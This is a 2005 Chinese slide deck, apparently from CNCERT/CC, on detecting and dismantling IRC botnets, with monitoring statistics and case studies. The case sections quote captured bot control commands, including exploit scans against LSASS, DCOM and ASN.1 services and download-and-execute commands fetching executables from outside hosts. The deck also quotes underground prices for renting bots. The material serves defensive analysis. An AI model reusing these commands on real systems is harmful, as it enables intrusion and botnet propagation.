(课件)-cncertcc关于僵尸网络的应对措施

《(课件)-cncertcc关于僵尸网络的应对措施》由会员分享，可在线阅读，更多相关《(课件)-cncertcc关于僵尸网络的应对措施（36页珍藏版）》请在金锄头文库上搜索。

1、CNCERT/CC关于僵尸网络的 应对措施,国家计算机网络应急技术处理协调中心 陈明奇 博士 2005年11月17日 天津,摘要,第一部分 背景 第二部分 发现和处置 第三部分 CNCERT/CC的工作 监测情况和活动规律 应对措施 第四部分 实际案例分析,一 背景,网络安全的传统三大威胁： 病毒/木马/蠕虫（Virus/Trojan/Worm） 拒绝服务攻击（DoS/DDoS） 垃圾邮件 （Spam）,黑客动机的改变： 以经济利益为驱动，不再追求轰动性效果带来的名声和炫耀技巧 组织的改变： 由单打独斗转向有组织的活动,主要的新威胁： 网络仿冒钓鱼陷井，防不胜防 间谍软件明修栈道，暗渡陈仓 垃

2、圾信息指哪发哪，带宽垃圾 僵尸网络黑色军团，一呼百应,如何应对这些新威胁？,网络仿冒APWG 间谍软件VENDER(MS, AV company) 垃圾信息尚未引起重视，将无所盾形 僵尸网络越来越严重，越来越多的人在谈论,2004年，美国最大的家庭宽带ISP Comcast被发现成为互联网上最大的垃圾邮件来源，Comcast的用户平均每天发送的8亿封邮件中，有88是使用存在于Comcast内的BotNet发送的垃圾邮件。，,趋势科技 TrendLabs在“2004年9月病毒感染分析报告”中指出，个人计算机成为任人摆布的僵尸计算机的机率，相较于去年9月成长23.5倍。,2004年10月网络安全机

3、构 SANS表示，僵尸计算机已被黑客当作用来勒索的工具，若要避免服务器因 DoS 而瘫痪的代价是付给黑客4万美金。,2004年11月，根据反网钓工作小组（APWG）的安全专家观察,网络钓鱼（Phishing）的技术愈来愈高明，现在骗徒可运用受控僵尸系统（BotNet）来扩大网钓范围，坐等受害者上钩。,2004年出现的Korgo系列、GaoBot系列、SdBot系列蠕虫组成的BotNet可接受控制者指令，实施许多网络攻击行动。 3月爆发的Witty蠕虫，Caida怀疑该蠕虫利用BotNet散发，因为其初始感染计算机数目超过100台。,Botnet网络安全界的新挑战,目前仍未得到有效遏制：,200

4、4年7月英国路透社的报导，有一个由青少年人组成的新兴行业正盛行：出租可由远程恶意程序任意摆布的计算机，这些受控制的计算机称之为”僵尸（Zombie）”计算机。数目小自10部大到3万部，只要买主愿意付钱，它们可以利用这些僵尸网络(BotNet)，进行垃圾邮件散播、网络诈欺(phishing)、散播病毒甚至拒绝服务攻击，代价仅需每小时100美元。,问题： 如何发现僵尸网络？ 到底僵尸网络在干什么？ 如何捣毁僵尸网络？,3.6 cents per bot week 6 cents per bot week September 2004 postings to SpecialH, Spamforum.

5、biz,20-30k always online SOCKs4, url is de-duped and updated every 10 minutes. 900/weekly, Samples will be sent on request. Monthly payments arranged at discount prices.,$350.00/weekly - $1,000/monthly (USD) Type of service: Exclusive (One slot only) Always Online: 5,000 - 6,000 Updated every: 10 mi

6、nutes,IRC僵尸网络的发现 一、蜜罐（Honeypot) 例子：“honeynet project”项目 二、IDS+IRC协议解析： 例子：863917网络安全监测平台 三、BOT行为特征： 快速加入型bot 长期连接型 bot 发呆型bot 例子：DdoSVax项目,二、僵尸网络的发现和处置,IRC僵尸网络发现方法比较,知己知彼： 控制服务器信息： 域名或IP、端口（port）、连接密码 (如果有)； 频道信息: 频道名（channel）、频道密码(如有)； 控制密码、编码规则和Host 控制者发送密码到频道中，用于标识身份，常以.login pass的形式出现。编码规则和是否启用h

7、ost认证是bot程序实现的，不体现在网络通信中。 Bot支持的命令集 主要功能，包括认证、升级和自删除类的命令，比如！login、.update、.download、.uninstall等。,僵尸网络的处置,一、擒贼先擒王模拟控制者，对僵尸网络进行完全控制 最终解决办法：直接找到控制服务器，需要授权或用户配合： 方法1：发送更新命令(吃毒丸) ； 方法2：发送自删除命令 (集体自杀)； 条件： 掌握控制者身份认证信息 二、釜底抽薪切断用户主机和控制服务器的联系 ： 方法1：网络边界上阻断C条件：得到授权 三、攘外必先安内清除用户终端上的Bot程序，打补丁： 手工查杀 专杀工具或升级杀毒程序

8、问题：如何发现BOT?,僵尸网络的处置,三、CNCERT/CC的工作,我们发现了什么？ 每两天一次报告Top 5，6月3日至9月19日，发现较大规模僵尸网络59个，平均每天发现3万个僵尸网络客户端 这些僵尸网络不断扫描扩张、更新版本、下载间谍软件和木马、发动各种形式的拒绝服务攻击。 例如： hotgirls网络，客户端数量最多时达到29624个。频道主题都是： ipscan s.s.s.s dcom2 86400 256 8000 s（利用dcom漏洞传播，客户端bot保持沉默） * wormride -s -t * download http:/ c:windowsdefrag32.exe

9、-e s(下载df.exe保存为defrag32并悄悄执行),僵尸网络情况统计 (2005年6月3日-6月 23日),IRC C 香港 :1.,发现一个客户端规模超过15万的僵尸网络 (2005年8月19日9月19日),发现一昵称为gunit的用户曾经登陆该网络并向多个频道发送控制命令，命令为扫描某种漏洞。如下。红色部分和样本的活动吻合。 8月29日 12点 PRIVMSG #asnftp :.login booties -s;cmd=:gunit!DIEdark.acid.x PRIVMSG #nesebot :.login nesebot -s;cmd=:gunit!DIEnese PRI

10、VMSG #urxbot :.login prx -s;cmd=:gunit!DIE; TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit; TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit; TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit TOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit; TOPIC #ph

11、at# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=:gunit;,发现了控制黑客的线索(2005年8月29日),僵尸网络的生命周期 (Life Cycle),一、僵尸网络的产生（botnet creation) 其他传播手段：垃圾邮件、社会工程学 蠕虫创建僵尸网络：Deloder/Mytob/Zotob 僵尸网络创建新的僵尸网络： 2005.9.18 9:00 332 botz-96018 #ass :!upd4t3z http:/peckno.site.voila.fr/win2k.e

12、xe the botz-96018连接到 67.43.*.*:6667 并加入 JOIN #suce fuck. 然后，接收新命令： :r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a b 于是，一个新的僵尸网络就在开始形成,僵尸网络的生命周期 (Life Cycle),二、僵尸网络的扩散（botnet spread） TOPIC #asn-new# :.advscan asn1smb 400 3 0 -r -b s TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -

13、r s TOPIC #xdcc4 :sadvscan asn1smb 150 5 0 201.5.x.x TOPIC #XOwneD :!ntscan 350 1000 -a -b; TOPIC #111 :.advscan lsass_445 100 5 120 -r 332 nffe #fanta :.scan pnp 50 6000 221 332 #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r; 332 #tvr0x :advscan dcom135 300 5 0 -r s 332 #Rxx :.asc -S -s!.ntscan 4

14、0 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h! 332 .#r00x %advscan dcom135 300 5 0 -r -b s 332 .#asn :.scanall s 332 .#.wadside :adv.start lsass 150 6 9999 -b -r s 332 .#.pwnt. :.xscan msass 300 5 0 -b -s; 332 .#.#smash3r#.# :.root.start msass 200 0 5 -a -r s 332 .#scarezsql# :-scan.startall!-bot.s

15、ecure -s!-scan.addnetrange x.x.x.x/16 100,僵尸网络的生命周期 (Life Cycle),三、僵尸网络的迁移（botnet transfer） 1. IRC Server变换物理主机(待发现实例) 2. IRC Server逻辑变换：动态域名，指向同一主机;克隆，创建一个新的线程连接到新的服务器和频道 3. IRC Server内部迁移 有的Bot会从一个频道迁移到另一频道。为达到这个目的，仅仅需要修改原始频道的主题即可。2005年9月27日发现的实例如下。,僵尸网络的生命周期 (Life Cycle),四、僵尸网络的升级（botnet update）

16、Bot文件升级：通过TOPIC或 PRIVMSG 2005.9.18 8.am :Nos!W0otpizzownage.edu TOPIC #hb3 :.hell.download http:/ explore.exe -e;cmd=; TOPIC #rooted :sdownload http:/site.voila.fr/qhzteam/asn.exe PRIVMSG #em :!upadfkadf http:/ stolen Bot 模块升级：增加或减少相应模块 2005年09月19日 02点NotaBot: PRIVMSG #NotaBot :.spread.remove.module mssqlrn PRIVMSG